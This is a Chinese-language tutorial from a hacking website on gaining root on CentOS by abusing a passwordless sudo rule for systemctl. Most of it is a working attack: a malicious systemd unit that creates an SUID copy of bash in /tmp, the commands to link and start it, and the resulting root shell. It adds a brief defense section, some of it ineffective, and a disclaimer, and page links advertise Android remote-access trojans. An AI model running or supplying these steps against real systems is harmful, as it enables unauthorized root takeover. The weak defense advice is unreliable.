点击查看-X黑手网
点击查看-X黑手网
实战:Linux 提权教程:利用 systemctl 进行权限提升

实战:Linux 提权教程:利用 systemctl 进行权限提升

04315

1. 简介

本教程演示如何利用 systemctl 的 sudo 权限配置不当,在 Linux 系统上实现提权(Privilege Escalation)。
适用环境:

CentOS 7.6(内核 4.19.0-6)

用户具有 sudo 权限运行 /bin/systemctl 且无需密码

2. 环境准备

2.1 检查系统信息 

cat /proc/version
cat /etc/redhat-release

输出示例:

Linux version 4.19.0-6.el7.ucloud.x86_64
 CentOS Linux release 7.6.1810 (Core)
 

fabfbd66eb6bc374b5a76cf9fcdf00e

2.2 检查当前用户权限

sudo -l

关键输出: 

用户 apps 可以在 uaccount3 上运行以下命令:
 (ALL) NOPASSWD: /bin/systemctl 
(ALL) NOPASSWD: /bin/whoami, /usr/bin/systemctl

image

✅ 发现可利用点:systemctl 可以无密码运行,且能管理所有服务。

3. 提权步骤

3.1 创建恶意 systemd 服务

在 /tmp/ 目录下创建 rootshell.service: 

cat > /tmp/rootshell.service << 'EOF' [Unit] Description=Root Shell [Service] Type=oneshot ExecStart=/bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' RemainAfterExit=yes [Install] WantedBy=multi-user.target EOF

作用:

复制 /bin/bash 到 /tmp/rootbash

设置 SUID 权限(chmod +s),使普通用户执行时获得 root 权限

11183c1221fbc2bf47102f9d090e5d6

3.2 加载并启动服务

sudo /bin/systemctl link /tmp/rootshell.service 
sudo /bin/systemctl enable --now rootshell.service

预期输出:

Created symlink from /etc/systemd/system/rootshell.service to /tmp/rootshell.service.

3.3 验证提权

检查 /tmp/rootbash 是否生成并具有 SUID 权限:

ls -la /tmp/rootbash

预期输出:

-rwsr-sr-x 1 root root 1234567 Jun 24 12:34 /tmp/rootbash

执行提权 Shell:

/tmp/rootbash -p

预期结果:

[root@uaccount3 tmp]# whoami root

🎉 提权成功!

image

4. 防御措施

4.1 管理员如何防范?

限制 sudo 权限:

visudo

移除不必要的 NOPASSWD 权限。

监控 /tmp 目录:

chmod 1777 /tmp # 确保 sticky bit 启用

更新 systemd:

yum update systemd

4.2 普通用户如何保护自己?

避免使用弱密码

不随意执行未知脚本

定期检查 sudo -l 权限

5. 总结

本教程演示了如何利用 systemctl 的 sudo 权限配置不当进行提权。
关键点:

检查 sudo -l 发现可利用命令

创建恶意 systemd 服务

加载服务并获取 root Shell

⚠️ 注意:此方法仅用于授权测试,未经授权攻击系统是违法行为!

相关工具:

LinPEAS(自动化提权检测)

本文脚本下载

✅ 完成! 现在你已掌握如何利用 systemctl 进行提权。

© 版权声明
1、本网站名称: X黑手网
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。

THE END
实战教程教程分享
喜欢就支持一下吧
点赞15赞赏 分享
admin的头像-X黑手网
百度自带的AI图片助手这么好用,去水印、画质优化、AI扩图、涂抹消除等功能一应俱全!-X黑手网
百度自带的AI图片助手这么好用,去水印、画质优化、AI扩图、涂抹消除等功能一应俱全!
百度自带的AI图片助手这么好用,去水印、画质优化、AI扩图、涂抹消除...
1年前 9484
安卓远控2024最新教程craxsrat7.4入侵安卓手机android12-android14-X黑手网
安卓远控2024最新教程craxsrat7.4入侵安卓手机android12-android14
安卓远控2024最新教程craxsrat7.4入侵安卓手机android12-android14
1年前 4489
智能手机数据恢复取证系统率先支持鸿蒙系统取证电子数据取证,微信聊天记录恢复-X黑手网
智能手机数据恢复取证系统率先支持鸿蒙系统取证电子数据取证,微信聊天记录恢复
智能手机数据恢复取证系统率先支持鸿蒙系统取证电子数据取证,微信聊...
2年前 3987
黑客工具 Flipper Zero 新手教程 + 资源干货!-X黑手网
黑客工具 Flipper Zero 新手教程 + 资源干货!
黑客工具 Flipper Zero 新手教程 + 资源干货!
2年前 3948
安卓远控Craxs Rat V4和v5.1 最新 2023 Android 远程访问工具-X黑手网
安卓远控Craxs Rat V4和v5.1 最新 2023 Android 远程访问工具
安卓远控Craxs Rat V4和v5.1 最新 2023 Android 远程访问工具
2年前 2675
手机破解WiFi密码之Stryker 是新一代的移动渗透测试应用程序以及使用教程-X黑手网
手机破解WiFi密码之Stryker 是新一代的移动渗透测试应用程序以及使用教程
手机破解WiFi密码之Stryker 是新一代的移动渗透测试应用程序以及使用...
2年前 2063
相关推荐
QQwwg教程(已失效)-X黑手网
QQwwg教程(已失效)
QQwwg教程(已失效)
2年前 7189
如何恢复微信的聊天记录,找回被删除的联系人!-X黑手网
如何恢复微信的聊天记录,找回被删除的联系人!
如何恢复微信的聊天记录,找回被删除的联系人!
1年前 1362
【实战测试]全新CraxsRat安卓远控来袭,自带免杀不报毒-X黑手网
【实战测试]全新CraxsRat安卓远控来袭,自带免杀不报毒
【实战测试]全新CraxsRat安卓远控来袭,自带免杀不报毒
7个月前 1326
自动化取证工具取证大师电子数据取证 ,Windows密码破解和手机取证-X黑手网
自动化取证工具取证大师电子数据取证 ,Windows密码破解和手机取证
自动化取证工具取证大师电子数据取证 ,Windows密码破解和手机取证
2年前 972
揭秘Windows图形化远控木马:“大灰狼”的真面目-X黑手网
揭秘Windows图形化远控木马:“大灰狼”的真面目
揭秘Windows图形化远控木马:“大灰狼”的真面目
7个月前 658
国内最全使用TikTok的所有方法,绕过TikTok检测机制方法-X黑手网
国内最全使用TikTok的所有方法,绕过TikTok检测机制方法
国内最全使用TikTok的所有方法,绕过TikTok检测机制方法
2年前 651
评论 抢沙发

请登录后发表评论

    暂无评论内容